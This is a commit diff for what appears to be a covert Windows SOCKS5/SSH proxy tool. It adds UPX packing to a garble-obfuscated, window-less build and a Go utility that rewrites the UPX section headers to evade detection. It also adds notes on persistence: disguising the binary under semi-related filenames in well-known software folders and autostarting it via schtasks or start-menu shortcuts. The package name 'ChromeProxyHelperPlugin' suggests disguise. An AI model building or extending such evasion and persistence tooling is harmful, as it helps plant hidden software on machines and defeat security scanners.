Add some development research notes and obfuscate two other headers in the UPX packed file

Makefile

@@ -21,6 +21,7 @@ socks5-ssh-proxy.release: resources $(SOURCES) $(GARBLE_BIN)
 win: socks5-ssh-proxy.exe
 socks5-ssh-proxy.exe: resources $(GARBLE_BIN) $(SOURCES)
 	GOOS=windows GOARCH=amd64 $(GARBLE_CMD) build -ldflags -H=windowsgui -tags release -o $@
+	upx $@
 goreleaser: resources $(GARBLE_BIN)
 	goreleaser build --clean --snapshot --id win-release
 win-package: ChromeProxyHelperPlugin.zip

README.md

@@ -61,7 +61,7 @@ Following detections have been tested:
 * go
 * upx
 * goreleaser
-* mingw-w64 (for building the windows dll)
+* mingw-w64 (for building the windows dll/exe)
 
 ## Related information
 
@@ -77,8 +77,4 @@ Following detections have been tested:
 
 * <https://pypi.org/project/unipacker/>
 * <https://medium.com/analytics-vidhya/running-go-code-from-python-a65b3ae34a2d>
-* <https://github.com/weak1337/Alcatraz>
 * <https://github.com/burrowers/garble?tab=readme-ov-file#mechanism>>
-* <https://medium.com/@ankyrockstar26/unpacking-a-upx-malware-dca2cdd1a8de>
-* <https://www.mosse-security.com/2020/09/29/upx-malware-evasion-technique.html?ref=nishtahir.com>
-* <https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create>

cmd/upx-obfuscator/main.go

@@ -6,8 +6,18 @@ import (
 	"log"
 )
 
-var originalIdentifier = []byte("UPX0")	 
+func bytesReplace(data, old, new []byte) []byte {
-var obfuscatedIdentifier = []byte("GSP7")	 
+	foundIndex := bytes.Index(data, old)
+	if foundIndex > -1 {
+		// Found it!
+		log.Println("Found identifier at offset", foundIndex)
+	} else {
+		return data
+		log.Fatalln("Error file is not UPX packed")
+	}
+
+	return bytes.Replace(data, old, new, 1)
+}
 
 func main() {
 	if len(os.Args) != 2 {
@@ -21,17 +31,11 @@ func main() {
 
 	data, _ := os.ReadFile(filename)
 
-	foundIndex := bytes.Index(data, originalIdentifier)
+	data = bytesReplace(data, []byte("UPX0"), []byte("GSP7"))
-	if foundIndex > -1 {
+	data = bytesReplace(data, []byte("UPX1"), []byte("GSP1"))
-		// Found it!
+	data = bytesReplace(data, []byte("UPX2"), []byte("GSP2"))
-		log.Println("Found UPX identifier at offset", foundIndex)
-	} else {
-		log.Fatalln("Error file is not UPX packed")
-	}
 
-
+	_ = os.WriteFile(filename, data, 0666)
-	obfuscatedData := bytes.Replace(data, originalIdentifier, obfuscatedIdentifier, 1)
-	_ = os.WriteFile(filename, obfuscatedData, 0666)
 
 	log.Println("done")
 }

docs/NOTES.md

@@ -0,0 +1,34 @@
+# Some notes to Escape from Babylon
+
+## Well known paths (Windows)
+
+* Python official install path for current user `%APPDATA\Local\Programs\Python\PythonXX`
+* NPM global current user path: `%APPDATA%\Roaming\npm\node_modules\npm\bin`
+* Go bin folder: `C:\Users\YourUsername\go\bin\go.exe`
+* Rust: `C:\Users\YourUsername\.cargo\bin\rustc.exe`
+* Haskel: `C:\Users\YourUsername\AppData\Roaming\local\bin\ghc.exe`
+* FireFox: `C:\Users\<username>\AppData\Local\Mozilla Firefox\firefox.exe`
+* Chrome: `C:\Users\<username>\AppData\Local\Google\Chrome\Application\chrome.exe`
+
+## Ultimate Packer for Executables (UPX)
+
+* <https://www.ired.team/offensive-security/defense-evasion/t1045-software-packing-upx>
+* <https://medium.com/@ankyrockstar26/unpacking-a-upx-malware-dca2cdd1a8de>
+* <https://www.mosse-security.com/2020/09/29/upx-malware-evasion-technique.html?ref=nishtahir.com>
+* <https://www.esecurityplanet.com/threats/upx-compression-detection-evasion/>
+
+## Persistence and hiding
+
+* Search for existing well known binary paths
+* Copy argv[0] to well known binary path
+* Register startup by system
+  * schtasks (cmd) for system or local user
+  * go-autostart: shortcut in start-menu
+* Write state file of persistence to somewhere...
+
+## Windows
+
+* Copy to well known current user binary path to semi related filenames
+* Run via start menu item for current user, or via `schtasks`
+  * <https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create>
+  * <https://github.com/emersion/go-autostart>